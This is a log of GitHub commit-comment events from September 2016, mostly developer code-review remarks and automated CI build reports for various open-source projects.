{"id":"4568189108","type":"CommitCommentEvent","actor":{"login":"sargol63"},"repo":{"name":"sargol63/hello-world"},"payload":{"comment":{"id":19036540,"position":null,"line":null,"path":null,"commit_id":"308c1d154a665bcf413a4faf05be7950859b7fcc","created_at":"2016-09-15T13:47:36Z","updated_at":"2016-09-15T13:47:36Z","body":"Hello\r\n"}},"created_at":"2016-09-15T13:47:36Z"}
{"id":"4568190279","type":"CommitCommentEvent","actor":{"login":"petro-rudenko"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19036542,"position":27,"line":36,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T13:47:48Z","updated_at":"2016-09-15T13:47:48Z","body":"No because you redefine `transform` method in your class. If you don't call `super.transform` it won't call that method."}},"created_at":"2016-09-15T13:47:48Z"}
{"id":"4568190861","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19036545,"position":null,"line":null,"path":null,"commit_id":"3b475b44bdbc4a96278abcd9d85209bd33c58865","created_at":"2016-09-15T13:47:54Z","updated_at":"2016-09-15T13:47:54Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1012](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13357&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:13:49"}},"created_at":"2016-09-15T13:47:54Z"}
{"id":"4568191758","type":"CommitCommentEvent","actor":{"login":"sargol63"},"repo":{"name":"sargol63/hello-world"},"payload":{"comment":{"id":19036546,"position":null,"line":null,"path":null,"commit_id":"308c1d154a665bcf413a4faf05be7950859b7fcc","created_at":"2016-09-15T13:48:04Z","updated_at":"2016-09-15T13:48:04Z","body":"Hello \r\n"}},"created_at":"2016-09-15T13:48:04Z"}
{"id":"4568204020","type":"CommitCommentEvent","actor":{"login":"trichromesltd"},"repo":{"name":"trichromesltd/trichromes"},"payload":{"comment":{"id":19036581,"position":null,"line":null,"path":null,"commit_id":"0dfb7ce8d17a962cc1a7ae34fc3045e1fa6601ee","created_at":"2016-09-15T13:50:06Z","updated_at":"2016-09-15T13:50:06Z","body":"Aww yea"}},"created_at":"2016-09-15T13:50:06Z"}
{"id":"4568208349","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":19036593,"position":5,"line":3637,"path":"sql/base/mangos.sql","commit_id":"7b37f7fe79809799e184cb60d096f574281afcf1","created_at":"2016-09-15T13:50:51Z","updated_at":"2016-09-15T13:50:51Z","body":"Done in https://github.com/classicdb/database/commit/1bf28976ed1b9d411f62a6440d54b3bd4d8d428b\r\nYou are right, even so \"small\" and unbreaking changes to the SQL files like this one should generate a new version/revision number. This update should have been z2685 and [the next one](https://github.com/cmangos/mangos-classic/commit/b084f64d44342e75fd49f477bd677003cecebc20) z2686 instead. It make it easier for DB devs to spot them and avoid overriding changes. :)"}},"created_at":"2016-09-15T13:50:51Z"}
{"id":"4568212636","type":"CommitCommentEvent","actor":{"login":"hakehuang"},"repo":{"name":"EmbeddedRPC/erpc"},"payload":{"comment":{"id":19036607,"position":4,"line":34,"path":"erpc_c/setup/erpc_setup.h","commit_id":"142ecdb6a595d5ad76da0a4b53c8a4e5ee8868f9","created_at":"2016-09-15T13:51:35Z","updated_at":"2016-09-15T13:51:35Z","body":"yes,but not a must."}},"created_at":"2016-09-15T13:51:35Z"}
{"id":"4568213957","type":"CommitCommentEvent","actor":{"login":"hakehuang"},"repo":{"name":"EmbeddedRPC/erpc"},"payload":{"comment":{"id":19036615,"position":14,"line":67,"path":"erpc_c/setup/erpc_setup.h","commit_id":"142ecdb6a595d5ad76da0a4b53c8a4e5ee8868f9","created_at":"2016-09-15T13:51:47Z","updated_at":"2016-09-15T13:51:47Z","body":"right. commit"}},"created_at":"2016-09-15T13:51:47Z"}
{"id":"4568214443","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19036619,"position":null,"line":null,"path":null,"commit_id":"53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0","created_at":"2016-09-15T13:51:52Z","updated_at":"2016-09-15T13:51:52Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2369 of 2370 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T13:51:52Z"}
{"id":"4568220157","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19036637,"position":null,"line":null,"path":null,"commit_id":"53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0","created_at":"2016-09-15T13:52:50Z","updated_at":"2016-09-15T13:52:50Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T13:52:50Z"}
{"id":"4568226002","type":"CommitCommentEvent","actor":{"login":"julesjacobsen"},"repo":{"name":"jmcmurry/monarch-app"},"payload":{"comment":{"id":19036649,"position":null,"line":null,"path":null,"commit_id":"ea31cbc4a4cb61217ca6534942ad0229ae0a12cb","created_at":"2016-09-15T13:53:48Z","updated_at":"2016-09-15T13:53:48Z","body":"Sure - as long as I look awesome :)\n\nOn Tue, Sep 13, 2016 at 10:15 PM, Julie McMurry <notifications@github.com>\nwrote:\n\n> Adding Jules' picture\n>\n> Hope this is ok @julesjacobsen?\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/jmcmurry/monarch-app/commit/\n> ea31cbc4a4cb61217ca6534942ad0229ae0a12cb\n>\n"}},"created_at":"2016-09-15T13:53:48Z"}
{"id":"4568229667","type":"CommitCommentEvent","actor":{"login":"bodnia"},"repo":{"name":"swagger-api/swagger-ui"},"payload":{"comment":{"id":19036657,"position":null,"line":null,"path":null,"commit_id":"183c67a7c5f1a8bbd7a5e6571d69319d02c71ba9","created_at":"2016-09-15T13:54:24Z","updated_at":"2016-09-15T13:54:24Z","body":"@webron @fehguy tested patch in IE11.589 and IE11.0.9600.17914 and it works fine. And at the same time w/o this change fonts do not load neither in Safari nor in IE.\r\n\r\n![11](https://cloud.githubusercontent.com/assets/8950657/18552309/7eefbe56-7b64-11e6-989e-1a4ef9288c6c.jpg)\r\n![2016-09-15 16_27_58-swagger ui - internet explorer](https://cloud.githubusercontent.com/assets/8950657/18552315/8867a138-7b64-11e6-9a39-779b5e41d1ef.png)\r\n\r\n@webron this is already in the source\r\nhttps://github.com/swagger-api/swagger-ui/blob/master/src/main/html/css/typography.css#L6\r\n\r\n@ChristianRamseier could you please provide the version of IE11 maybe this could help?"}},"created_at":"2016-09-15T13:54:24Z"}
{"id":"4568230296","type":"CommitCommentEvent","actor":{"login":"mikefenton"},"repo":{"name":"jmmcd/PonyGE2"},"payload":{"comment":{"id":19036659,"position":null,"line":null,"path":null,"commit_id":"42bf5f90dada887dcfed22b187edd6e47d17bc29","created_at":"2016-09-15T13:54:31Z","updated_at":"2016-09-15T13:54:31Z","body":"Is this a regression problem?"}},"created_at":"2016-09-15T13:54:31Z"}
{"id":"4568234114","type":"CommitCommentEvent","actor":{"login":"CodingCat"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19036673,"position":27,"line":36,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T13:55:07Z","updated_at":"2016-09-15T13:55:07Z","body":"I see what you mean...I suggest we might move to higher level to extend Predictor https://github.com/apache/spark/blob/master/mllib/src/main/scala/org/apache/spark/ml/Predictor.scala#L71 instead of classifier, as XGBoost also support regression tasks?"}},"created_at":"2016-09-15T13:55:07Z"}
{"id":"4568239445","type":"CommitCommentEvent","actor":{"login":"Meticulus"},"repo":{"name":"Meticulus/android_device_samsung_codinalte"},"payload":{"comment":{"id":19036689,"position":null,"line":null,"path":null,"commit_id":"7aaabe8577a61a2b0cd039670cd639c0a06373d3","created_at":"2016-09-15T13:55:56Z","updated_at":"2016-09-15T13:55:56Z","body":"RIL: https://github.com/Meticulus/android_device_samsung_codinalte/commit/31c71bb44247cacffe4e61c04528ed9678a951d1\r\n\r\n\r\nA2DP: I will test.. I have a BT Headset...\r\n\r\nThanks for all your help, I was really bogged down in that RIL issue. That ASHMEM thing was really messing me up..."}},"created_at":"2016-09-15T13:55:56Z"}
{"id":"4568240149","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19036690,"position":68,"line":68,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/BaseMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T13:56:04Z","updated_at":"2016-09-15T13:56:04Z","body":"I think all of this is not threadsafe.\r\n\r\nSupposing 2 Threads A and B : \r\n - the matcher is not running.\r\n - A run `start()`, then just after running.compareAndSet(false, true), B become active.\r\n - now we have no guarantee about what will happen."}},"created_at":"2016-09-15T13:56:04Z"}
{"id":"4568246551","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19036707,"position":null,"line":null,"path":null,"commit_id":"a589d57cd91a7c39bf95a159df891437041e583e","created_at":"2016-09-15T13:57:09Z","updated_at":"2016-09-15T13:57:09Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T13:57:09Z"}
{"id":"4568246627","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19036708,"position":27,"line":235,"path":"californium-core/src/main/java/org/eclipse/californium/core/CoapServer.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T13:57:10Z","updated_at":"2016-09-15T13:57:10Z","body":"No, this has nothing to do with the introduction of the `MessageExchangeStore`.\r\n\r\nThis is more of a desperate attempt to shut down the executor cleanly by trying to run all outstanding tasks. When executing the test suite, the test cases often hang at this point and *stall* for the full time before giving up. So far, I haven't found the reason for that :-( "}},"created_at":"2016-09-15T13:57:10Z"}
{"id":"4568247267","type":"CommitCommentEvent","actor":{"login":"TheDoct0r11"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19036709,"position":161,"line":206,"path":"Yupi.Model/Domain/Rooms/Entity/RoomEntity.cs","commit_id":"88b59473f5f4d655d22b0264a2cf1210cdb3346f","created_at":"2016-09-15T13:57:16Z","updated_at":"2016-09-15T13:57:16Z","body":"Yes"}},"created_at":"2016-09-15T13:57:16Z"}
{"id":"4568247535","type":"CommitCommentEvent","actor":{"login":"bjacobel"},"repo":{"name":"FIRSTdotorg/edx-platform"},"payload":{"comment":{"id":19036710,"position":5,"line":56,"path":"pavelib/assets.py","commit_id":"1b5c28e2f2d414b94a73f114e30398a31585cfa1","created_at":"2016-09-15T13:57:19Z","updated_at":"2016-09-15T13:57:19Z","body":"This will make installs done under NPM3 work, but will break installs done with NPM2, iirc. We'll have to fix this upstream in the UI Toolkit by making `backbone.paginator` a `dependencies` and a `peerDependencies` for compatibility with both npm versions.\r\n\r\nfyi @andy-armstrong"}},"created_at":"2016-09-15T13:57:19Z"}
{"id":"4568251067","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19036724,"position":null,"line":null,"path":null,"commit_id":"281993afc046cac5ad8a877ec74ef1e03d186eb4","created_at":"2016-09-15T13:57:51Z","updated_at":"2016-09-15T13:57:51Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=70)"}},"created_at":"2016-09-15T13:57:51Z"}
{"id":"4568251229","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19036725,"position":null,"line":null,"path":null,"commit_id":"0bc92a2e2896a848c4f4f5dfce15978c31e6b792","created_at":"2016-09-15T13:57:53Z","updated_at":"2016-09-15T13:57:53Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=70)"}},"created_at":"2016-09-15T13:57:53Z"}
{"id":"4568251258","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19036726,"position":null,"line":null,"path":null,"commit_id":"df3fb784035ad641bfc8e03c575040a76e88ab76","created_at":"2016-09-15T13:57:53Z","updated_at":"2016-09-15T13:57:53Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=70)"}},"created_at":"2016-09-15T13:57:53Z"}
{"id":"4568255511","type":"CommitCommentEvent","actor":{"login":"publicJorn"},"repo":{"name":"iurii-kyrylenko/angular2-webpack"},"payload":{"comment":{"id":19036736,"position":20,"line":13,"path":"src/app/app.routing.ts","commit_id":"84a3c94e87de1cd30ac94a30f5c998c3bd7515d7","created_at":"2016-09-15T13:58:34Z","updated_at":"2016-09-15T13:58:34Z","body":"This new method of async loading for webpack is great @iurii-kyrylenko! An enormous improvement to the \"RC5 method\".\r\nI'm a bit puzzled by this line though. If you have the time, would you explain it to me?"}},"created_at":"2016-09-15T13:58:34Z"}
{"id":"4568258600","type":"CommitCommentEvent","actor":{"login":"djkirby"},"repo":{"name":"istarkov/google-map-react"},"payload":{"comment":{"id":19036743,"position":15,"line":418,"path":"src/google_map.js","commit_id":"670fadd2da1086bc41185a00503280929e4476a1","created_at":"2016-09-15T13:59:05Z","updated_at":"2016-09-15T13:59:05Z","body":"IE 10 doesn't support Object.assign, so should we use a polyfill ourselves now?"}},"created_at":"2016-09-15T13:59:05Z"}
{"id":"4568259976","type":"CommitCommentEvent","actor":{"login":"vargaz"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19036749,"position":null,"line":null,"path":null,"commit_id":"bc9461168edd5bceab698999685f3cbfdd113107","created_at":"2016-09-15T13:59:19Z","updated_at":"2016-09-15T13:59:19Z","body":"Had to revert it as it was breaking the wrench build (the gtk-sharp build). The failure didn't show up because of build caching. The revert fixed the build:\r\nhttps://wrench.internalx.com/Wrench/index.aspx?lane=mono-master"}},"created_at":"2016-09-15T13:59:19Z"}
{"id":"4568260653","type":"CommitCommentEvent","actor":{"login":"kkrysiak"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19036754,"position":null,"line":null,"path":null,"commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-15T13:59:25Z","updated_at":"2016-09-15T13:59:25Z","body":"That's my assumption but did you confirm it."}},"created_at":"2016-09-15T13:59:25Z"}
{"id":"4568282989","type":"CommitCommentEvent","actor":{"login":"rmartinho"},"repo":{"name":"ericniebler/range-v3"},"payload":{"comment":{"id":19036802,"position":33,"line":307,"path":"include/range/v3/detail/config.hpp","commit_id":"4cfcb59c3db1c279d72c64ccf15de3c724a0362d","created_at":"2016-09-15T14:03:05Z","updated_at":"2016-09-15T14:03:05Z","body":"If this macro is to be the replacement for the now deprecated `static_const`, I think this should use `::ranges::static_const` instead."}},"created_at":"2016-09-15T14:03:05Z"}
{"id":"4568289878","type":"CommitCommentEvent","actor":{"login":"royyandzakiy"},"repo":{"name":"royyandzakiy/tutorial.github"},"payload":{"comment":{"id":19036815,"position":null,"line":null,"path":null,"commit_id":"087e0f64d94de40d439b41f9e6309bb922e98dc1","created_at":"2016-09-15T14:04:14Z","updated_at":"2016-09-15T14:04:14Z","body":"no comment"}},"created_at":"2016-09-15T14:04:14Z"}
{"id":"4568290848","type":"CommitCommentEvent","actor":{"login":"betgeri"},"repo":{"name":"betgeri/hello-word"},"payload":{"comment":{"id":19036819,"position":null,"line":null,"path":null,"commit_id":"93a790fb2cdd6534be90e022359799adb9a4e336","created_at":"2016-09-15T14:04:23Z","updated_at":"2016-09-15T14:04:23Z","body":"hi \r\nnew project"}},"created_at":"2016-09-15T14:04:23Z"}
{"id":"4568291423","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"spiffy/PyRakLib"},"payload":{"comment":{"id":19036824,"position":null,"line":null,"path":null,"commit_id":"6fb5c8b20cd9181ab56762281947e96cfaa4a22a","created_at":"2016-09-15T14:04:29Z","updated_at":"2016-09-15T14:04:29Z","body":"-_- I know"}},"created_at":"2016-09-15T14:04:29Z"}
{"id":"4568306849","type":"CommitCommentEvent","actor":{"login":"kaspermarstal"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19036876,"position":null,"line":null,"path":null,"commit_id":"7ca133d888ae89ad0e7e85ed85b33cce03e6c7e7","created_at":"2016-09-15T14:06:54Z","updated_at":"2016-09-15T14:06:54Z","body":"Okay. We should probably change uncrustify then. If the user has not enabled C++11, you get all sorts of errors from clang that a space is needed, which overshadows the real error message, that C++11 is not enabled. "}},"created_at":"2016-09-15T14:06:54Z"}
{"id":"4568306869","type":"CommitCommentEvent","actor":{"login":"adlk"},"repo":{"name":"meetfranz/plugins"},"payload":{"comment":{"id":19036877,"position":null,"line":null,"path":null,"commit_id":"7bafee8dbb62b5395091521d9f67e5aace514ac3","created_at":"2016-09-15T14:06:54Z","updated_at":"2016-09-15T14:06:54Z","body":"Ok... that was fast ;)\r\n"}},"created_at":"2016-09-15T14:06:54Z"}
{"id":"4568313416","type":"CommitCommentEvent","actor":{"login":"ChristianRamseier"},"repo":{"name":"swagger-api/swagger-ui"},"payload":{"comment":{"id":19036909,"position":null,"line":null,"path":null,"commit_id":"183c67a7c5f1a8bbd7a5e6571d69319d02c71ba9","created_at":"2016-09-15T14:07:58Z","updated_at":"2016-09-15T14:07:58Z","body":"I used IE 11.0.9600.18376\n\nOn Thu, Sep 15, 2016 at 3:54 PM, Anna <notifications@github.com> wrote:\n\n> @webron <https://github.com/webron> @fehguy <https://github.com/fehguy>\n> tested patch in IE11.589 and IE11.0.9600.17914 and it works fine. And at\n> the same time w/o this change fonts do not load neither in Safari nor in IE.\n>\n> [image: 11]\n> <https://cloud.githubusercontent.com/assets/8950657/18552309/7eefbe56-7b64-11e6-989e-1a4ef9288c6c.jpg>\n> [image: 2016-09-15 16_27_58-swagger ui - internet explorer]\n> <https://cloud.githubusercontent.com/assets/8950657/18552315/8867a138-7b64-11e6-9a39-779b5e41d1ef.png>\n>\n> @webron <https://github.com/webron> this is already in the source\n> https://github.com/swagger-api/swagger-ui/blob/master/\n> src/main/html/css/typography.css#L6\n>\n> @ChristianRamseier <https://github.com/ChristianRamseier> could you\n> please provide the version of IE11 maybe this could help?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/swagger-api/swagger-ui/commit/183c67a7c5f1a8bbd7a5e6571d69319d02c71ba9#commitcomment-19036657>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABZrxslwjBlu3QJUT4CX1qKD8W-fYJ7zks5qqU4ggaJpZM4J6XRh>\n> .\n>\n"}},"created_at":"2016-09-15T14:07:58Z"}
{"id":"4568316219","type":"CommitCommentEvent","actor":{"login":"JogoShugh"},"repo":{"name":"openAgile/CommitStream.Web"},"payload":{"comment":{"id":19036921,"position":7,"line":83,"path":"src/app/test/api/translators/gitLabTranslator.tests.js","commit_id":"5b63df1d424e30edb0b05f8b6f69e283201ea2e0","created_at":"2016-09-15T14:08:27Z","updated_at":"2016-09-15T14:08:27Z","body":"Nice!"}},"created_at":"2016-09-15T14:08:27Z"}
{"id":"4568325210","type":"CommitCommentEvent","actor":{"login":"xyklex"},"repo":{"name":"dkrimmer84/l10n_co_point_of_sale"},"payload":{"comment":{"id":19036950,"position":null,"line":null,"path":null,"commit_id":"e09895db55aeb4a0b3eaa7394b5ba1a6b7fc6b6d","created_at":"2016-09-15T14:09:56Z","updated_at":"2016-09-15T14:09:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;EOU2zMao&#x2F;250-bug-pos-error-cuando-uno-valida-un-ticket-sin-cliente\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> BUG: POS - Error cuando uno valida un ticket sin cliente</a>"}},"created_at":"2016-09-15T14:09:56Z"}
{"id":"4568325231","type":"CommitCommentEvent","actor":{"login":"perfectboy"},"repo":{"name":"perfectboy/Student-2048new"},"payload":{"comment":{"id":19036951,"position":null,"line":null,"path":null,"commit_id":"78838afca4c15409e7ce3179fe091f46f26ad6b1","created_at":"2016-09-15T14:09:56Z","updated_at":"2016-09-15T14:09:56Z","body":"2048意义何在？"}},"created_at":"2016-09-15T14:09:56Z"}
{"id":"4568325619","type":"CommitCommentEvent","actor":{"login":"dmitrytrager"},"repo":{"name":"fs/elixir-base"},"payload":{"comment":{"id":19036953,"position":6,"line":21,"path":"config/config.exs","commit_id":"ff58b8f8000bc6002590151af05d3701aeeb4b03","created_at":"2016-09-15T14:10:00Z","updated_at":"2016-09-15T14:10:00Z","body":"one more good thing for logging to note: https://github.com/fs/motion_grab/blob/master/mix.exs#L41"}},"created_at":"2016-09-15T14:10:00Z"}
{"id":"4568333917","type":"CommitCommentEvent","actor":{"login":"istarkov"},"repo":{"name":"istarkov/google-map-react"},"payload":{"comment":{"id":19036976,"position":15,"line":418,"path":"src/google_map.js","commit_id":"670fadd2da1086bc41185a00503280929e4476a1","created_at":"2016-09-15T14:11:26Z","updated_at":"2016-09-15T14:11:26Z","body":"Yes, https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support\r\nso do I"}},"created_at":"2016-09-15T14:11:26Z"}
{"id":"4568334404","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19036978,"position":null,"line":null,"path":null,"commit_id":"53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0","created_at":"2016-09-15T14:11:31Z","updated_at":"2016-09-15T14:11:31Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1763 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-15T14:11:31Z"}
{"id":"4568345961","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19037012,"position":68,"line":68,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/BaseMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T14:13:29Z","updated_at":"2016-09-15T14:13:29Z","body":"Well, at least we can make sure that no two threads start up the component in parallel, right? But I guess you are right that for when `start()` returns for thread B (doing nothing) it is not guaranteed that the component is running.  Is that what you meant?"}},"created_at":"2016-09-15T14:13:29Z"}
{"id":"4568350059","type":"CommitCommentEvent","actor":{"login":"betgeri"},"repo":{"name":"betgeri/hello-word"},"payload":{"comment":{"id":19037017,"position":null,"line":null,"path":null,"commit_id":"93a790fb2cdd6534be90e022359799adb9a4e336","created_at":"2016-09-15T14:14:09Z","updated_at":"2016-09-15T14:14:09Z","body":"errtr"}},"created_at":"2016-09-15T14:14:09Z"}
{"id":"4568356923","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19037038,"position":null,"line":null,"path":null,"commit_id":"78a2f38268be239cc43e8b2a119d1ef598f8cf3e","created_at":"2016-09-15T14:15:15Z","updated_at":"2016-09-15T14:15:15Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n- [source/_partials/terminus_navbar.html](https://github.com/pantheon-systems/documentation/commit/03ecbc999ba0dc184a1a46048b62ac30f70f2827/source/_partials/terminus_navbar.html)\n- [source/_views/terminuspage.html](https://github.com/pantheon-systems/documentation/commit/03ecbc999ba0dc184a1a46048b62ac30f70f2827/source/_views/terminuspage.html)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/03ecbc999ba0dc184a1a46048b62ac30f70f2827/source/docs/assets/css/main.css)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/03ecbc999ba0dc184a1a46048b62ac30f70f2827/source/docs/assets/js/main.js)\n- [Vagrantfile](https://github.com/pantheon-systems/documentation/commit/78a2f38268be239cc43e8b2a119d1ef598f8cf3e/Vagrantfile)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/78a2f38268be239cc43e8b2a119d1ef598f8cf3e/scripts/deploy-live.sh)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/78a2f38268be239cc43e8b2a119d1ef598f8cf3e/scripts/deploy-multidev.sh)\n- [source/docs/assets/terminuscommands.json](https://github.com/pantheon-systems/documentation/commit/78a2f38268be239cc43e8b2a119d1ef598f8cf3e/source/docs/assets/terminuscommands.json)\n"}},"created_at":"2016-09-15T14:15:15Z"}
{"id":"4568360377","type":"CommitCommentEvent","actor":{"login":"ChronoMonochrome"},"repo":{"name":"Meticulus/android_device_samsung_codinalte"},"payload":{"comment":{"id":19037049,"position":null,"line":null,"path":null,"commit_id":"7aaabe8577a61a2b0cd039670cd639c0a06373d3","created_at":"2016-09-15T14:15:46Z","updated_at":"2016-09-15T14:15:46Z","body":"> RIL: 31c71bb \r\n\r\nYeah, thanks, I've already tried it yesterday and it works like a charm :) \r\n\r\n> A2DP: I will test.. I have a BT Headset...\r\n\r\nThanks, I'm not in a hurry, I probably wouldn't even find this issue if someone from 4pda forum wouldn't notice it.\r\n\r\n> Thanks for all your help, I was really bogged down in that RIL issue. That ASHMEM thing was really messing me up...\r\n\r\nYou are welcome :)\r\nP.s. I've just quickly tried using sensors hw lib, just wanna to ask, is there anything I need to check/use from the kernel drivers in order to implement it in sensors lib? We have the same proximity sensor tmd2672 and bma222 as accelerometer. I haven't digged it too deeply so far, but logcat was complaining something like \"no config is assigned to the proximity sensor\"."}},"created_at":"2016-09-15T14:15:46Z"}
{"id":"4568363815","type":"CommitCommentEvent","actor":{"login":"rootfs"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19037059,"position":219,"line":527,"path":"pkg/volume/glusterfs/glusterfs.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-15T14:16:22Z","updated_at":"2016-09-15T14:16:22Z","body":"per @eparis, would heketi be a good source of authority to know if the cluster is still in use and delete the endpoint if the cluster is not used any more."}},"created_at":"2016-09-15T14:16:22Z"}
